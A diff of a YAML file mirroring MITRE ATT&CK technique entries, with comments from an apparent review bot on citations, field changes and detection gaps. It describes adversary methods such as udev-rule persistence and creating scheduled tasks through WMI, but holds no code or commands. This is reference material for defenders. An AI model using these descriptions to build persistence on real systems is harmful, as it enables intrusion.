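Review bot: x_mitre_platforms for T1078.004 drops 'Azure AD', 'Office 365' and 'Google Workspace' in favour of 'Office Suite' and 'Identity Provider', so any per-platform index or filter still keyed on the three old names will no longer match this technique; check that the index generator and any consumer grouping techniques by platform have been updated for the renamed platforms before merging. The 1.7 to 1.8 version bump in the same hunk indicates this is an upstream content change rather than a local edit, so the fix belongs in the tooling, not in this file.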
@@ -23861,17 +24124,14 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
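Review bot: the sentence added to the T1053.002 description about scheduling through the `Win32_ScheduledJob` WMI class does not say whether the Task Scheduler service and local Administrators requirements stated in the preceding sentence also apply to that route, and a job created over WMI produces no at.exe command line, so the 'Command: Command Execution' data source listed for this technique will not observe it; consider noting that 'Scheduled Job: Scheduled Job Creation' (and WMI activity) is the telemetry that covers that variant.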
@@ -23934,7 +24194,7 @@ privilege-escalation:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -23968,8 +24228,8 @@ privilege-escalation:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
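Review bot: the Leoloobeek citation swaps twitter.com for x.com and resets the retrieval date from December 12, 2017 to September 12, 2024; for a 2017 tweet an archived copy (web.archive.org) would be the durable reference, since the twitter.com URL still resolved and the x.com one may not outlive it. The identical swap is repeated for the same source under T1053.005 further down, so whichever form is chosen should be applied to both.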
@@ -23978,6 +24238,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
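Review bot: the URL for the new 'Malicious Life by Cybereason' source carries a `#blog-subscribe` fragment that points at the newsletter widget rather than the article; strip it to `https://www.cybereason.com/blog/wmi-lateral-movement-win32`. The description also reads 'Philip Tsukerman. (n.d.)' while the neighbouring entries use 'Surname, Initial. (year, month day)', so align the author and date format with the existing citation style.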
@@ -23990,7 +24254,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
T1055.001:
@@ -24093,9 +24356,67 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1546.007:
technique:
x_mitre_platforms:
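Review bot: the x_mitre_detection string for the new T1546.017 names only three rule directories (`/etc/udev/rules.d/`, `/lib/udev/rules.d/`, /usr/lib/udev/rules.d/) while the description lists five, leaving out `/run/udev/rules.d/` and `/usr/local/lib/udev/rules.d/`, so any detection built from this field would miss two writable locations the description itself calls out. The same string has mismatched formatting (the third path lacks the backticks the first two have) and a trailing space before the closing quote; since this is mirrored upstream text, the fix is to report it to ATT&CK, but the missing directories are worth noting in any local detection guidance now.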
@@ -24131,7 +24452,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -24155,12 +24476,11 @@ privilege-escalation:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -24244,11 +24564,10 @@ privilege-escalation:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -24300,9 +24619,8 @@ privilege-escalation:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1574.012:
@@ -24351,7 +24669,7 @@ privilege-escalation:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -24389,30 +24707,29 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
execution:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
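Review bot: T1574.012 loses `x_mitre_attack_spec_version: 2.1.0` together with `spec_version`, and nothing replaces it, whereas every other object in this patch keeps or bumps x_mitre_attack_spec_version; confirm the upstream object really lacks the field, otherwise the generator dropped it. Lower in the same hunk, the T1053.005 description should spell 'PowerShell' rather than 'Powershell', and the '(Citation: Stack Overflow)' attached to the Control Panel sentence cites a Q&A thread for a claim a Microsoft reference would support better.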
@@ -24459,7 +24776,7 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -24491,8 +24808,8 @@ execution:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -24506,6 +24823,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -24518,16 +24839,19 @@ execution:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1047:
technique:
- modified: '2024-04-11T18:13:25.130Z'
+ modified: '2024-10-15T15:20:57.328Z'
name: Windows Management Instrumentation
description: |-
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -24593,7 +24917,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1047
atomic_tests: []
T1129:
@@ -24670,66 +24993,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1129
atomic_tests: []
T1059.007:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Cody Thomas, SpecterOps
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
- type: attack-pattern
- created: '2020-06-23T19:12:24.924Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1059.007
- url: https://attack.mitre.org/techniques/T1059/007
- - source_name: NodeJS
- url: https://nodejs.org/
- description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
- - source_name: JScrip May 2018
- url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
- description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
- June 23, 2020.
- - source_name: Microsoft JScript 2007
- url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
- description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
- ECMAScript …. Retrieved June 23, 2020.
- - source_name: Microsoft Windows Scripts
- url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
- description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
- June 23, 2020.
- - source_name: Apple About Mac Scripting 2016
- url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
- description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
- 14, 2021.
- - source_name: SpecterOps JXA 2020
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
- 2021.
- - source_name: SentinelOne macOS Red Team
- url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
- description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
- APIs Without Building Binaries. Retrieved July 17, 2020.'
- - source_name: Red Canary Silver Sparrow Feb2021
- url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
- description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
- wings: Outing macOS malware before it takes flight. Retrieved April 20,
- 2021.'
- - source_name: MDSec macOS JXA and VSCode
- url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
- description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
- with VSCode Extensions. Retrieved April 20, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-07-30T14:12:52.698Z'
name: 'Command and Scripting Interpreter: JavaScript'
description: |-
Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
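Review bot: this hunk deletes the platforms, domains, contributors, object id, created stamps and the full ten-entry external_references list of T1059.007 only for the following hunk to re-add them lower in the object, so the diff reads as a full rewrite when the substantive change is the `modified` stamp and the 2.1 to 2.2 version bump; having the generator emit keys in a fixed order would keep future upstream syncs reviewable. All ten references (mitre-attack, NodeJS, JScrip May 2018, Microsoft JScript 2007, Microsoft Windows Scripts, Apple About Mac Scripting 2016, SpecterOps JXA 2020, SentinelOne macOS Red Team, Red Canary Silver Sparrow Feb2021, MDSec macOS JXA and VSCode) do reappear, so no citation is lost.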
@@ -24742,31 +25010,83 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_contributors:
+ - Cody Thomas, SpecterOps
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Monitor for execution of JXA through osascript
and usage of OSAScript
API that may be related to other suspicious behavior occurring on the system.
Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+ created: '2020-06-23T19:12:24.924Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/007
+ external_id: T1059.007
+ - source_name: Apple About Mac Scripting 2016
+ description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+ 14, 2021.
+ url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+ - source_name: MDSec macOS JXA and VSCode
+ description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+ with VSCode Extensions. Retrieved April 20, 2021.
+ url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+ - source_name: Microsoft JScript 2007
+ description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+ ECMAScript …. Retrieved June 23, 2020.
+ url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+ - source_name: Microsoft Windows Scripts
+ description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+ - source_name: JScrip May 2018
+ description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+ - source_name: NodeJS
+ description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+ url: https://nodejs.org/
+ - source_name: SentinelOne macOS Red Team
+ description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+ APIs Without Building Binaries. Retrieved July 17, 2020.'
+ url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+ - source_name: SpecterOps JXA 2020
+ description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+ 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: Red Canary Silver Sparrow Feb2021
+ description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+ wings: Outing macOS malware before it takes flight. Retrieved April 20,
+ 2021.'
+ url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.007
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
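Review bot: x_mitre_permissions_required (User, Administrator, SYSTEM) is dropped from T1059.007 and x_mitre_remote_support: false is added, yet T1053.003 in this same patch keeps `x_mitre_permissions_required: - User` while also gaining x_mitre_remote_support: false; either upstream removed the field for one technique and not the other, or the generator is inconsistent. Confirm against the upstream bundle before merging, since anything that filters techniques by required privilege will silently lose T1059.007.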
@@ -24824,9 +25144,8 @@ execution:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests:
- name: ListCronjobs
@@ -24987,20 +25306,19 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1559.002
atomic_tests: []
T1204.002:
technique:
- modified: '2023-04-21T12:22:19.740Z'
+ modified: '2024-09-25T20:50:34.876Z'
name: 'User Execution: Malicious File'
description: "An adversary may rely upon a user opening a malicious file in
order to gain execution. Users may be subjected to social engineering to get
them to open a file that will lead to code execution. This user action will
typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
Adversaries may use several types of files that require a user to execute
- them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
- may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+ them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+ .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
to increase the likelihood that a user will open and successfully execute
a malicious file. These methods may include using a familiar naming convention
@@ -25028,7 +25346,7 @@ execution:
- Linux
- macOS
- Windows
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -25048,33 +25366,13 @@ execution:
url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1204.002
atomic_tests: []
T1053.003:
